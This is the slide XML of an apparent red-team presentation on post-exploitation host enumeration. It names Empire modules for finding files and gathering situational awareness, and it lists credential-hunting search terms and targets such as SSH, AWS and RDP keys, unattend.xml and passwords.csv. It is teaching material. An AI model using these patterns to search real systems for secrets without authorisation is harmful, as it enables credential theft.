          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="47625"/>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9727869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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="94736"/>
            <a:ext cx="9404723" cy="713064"/>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Host Enumeration  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sensitive Files</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D0006C1-4BFB-4AE5-AFD3-ADFBDDB652BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="209458" y="1863731"/>
            <a:ext cx="10825612" cy="4601260"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What / Where</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>.configs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>.properties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>passwords.csv</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>SSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>AWS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>RDP Keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Scripts (for hardcoded passwords)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{755FAC1D-A179-4D7E-8136-AB5589FE2387}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6569737" y="1685582"/>
            <a:ext cx="5233479" cy="3747957"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="266073592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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="-97136"/>
            <a:ext cx="9404723" cy="713064"/>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Host Enumeration  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sensitive Files</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DAE3BF9-06B8-45FD-8FEA-E4C57595B790}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="145481" y="1905506"/>
            <a:ext cx="3990975" cy="2000548"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Default Search Terms:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>‘pass’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>‘sensitive’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>‘admin’</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28960A9D-69CD-4A46-8F3B-1E3DAEB59B84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2530640" y="2336394"/>
            <a:ext cx="3990975" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>unattend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>*.xml’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>‘.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>vmdk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>‘creds’</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD65659B-5E09-4AF4-8984-FA6107AEB7F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="268547" y="3906054"/>
            <a:ext cx="10152697" cy="2951946"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C96CB64B-6848-47BD-A7B5-EDD955E102EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6296924" y="2336394"/>
            <a:ext cx="2609850" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>‘login’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>‘secret’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>‘credential’</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC8BA833-4889-42CC-A7D0-B4C5BD3D7D36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9097274" y="2416063"/>
            <a:ext cx="2381250" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>‘.config’</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02276E17-C4DA-40EB-AF07-E0C11B74C827}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2825432" y="1173402"/>
            <a:ext cx="7792262" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Empire Module:      collection/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>find_interesting_file</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C2FC32"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="262889554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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="94736"/>
            <a:ext cx="9404723" cy="713064"/>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Host Enumeration  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D0006C1-4BFB-4AE5-AFD3-ADFBDDB652BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1625215" y="2692280"/>
            <a:ext cx="8941568" cy="2800767"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Run lots of manual commands or….</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C2FC32"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use modules!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="295397983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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="-97136"/>
            <a:ext cx="9404723" cy="713064"/>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Host Enumeration  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Winenum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> pt.1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DAE3BF9-06B8-45FD-8FEA-E4C57595B790}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="351748" y="2014659"/>
            <a:ext cx="11488501" cy="4216539"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Outputs:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>AD group memberships</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Last 5 files opened</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Interesting Files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Clipboard contents   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Available Shares</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02276E17-C4DA-40EB-AF07-E0C11B74C827}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1597543" y="1236471"/>
            <a:ext cx="8996909" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Empire Module:      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>situational_awareness</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/host/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>winenum</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C2FC32"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10110619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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="-97136"/>
            <a:ext cx="9404723" cy="713064"/>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Host Enumeration  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Winenum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> pt.1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DAE3BF9-06B8-45FD-8FEA-E4C57595B790}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="351748" y="2014659"/>
            <a:ext cx="11488501" cy="4216539"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Outputs:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
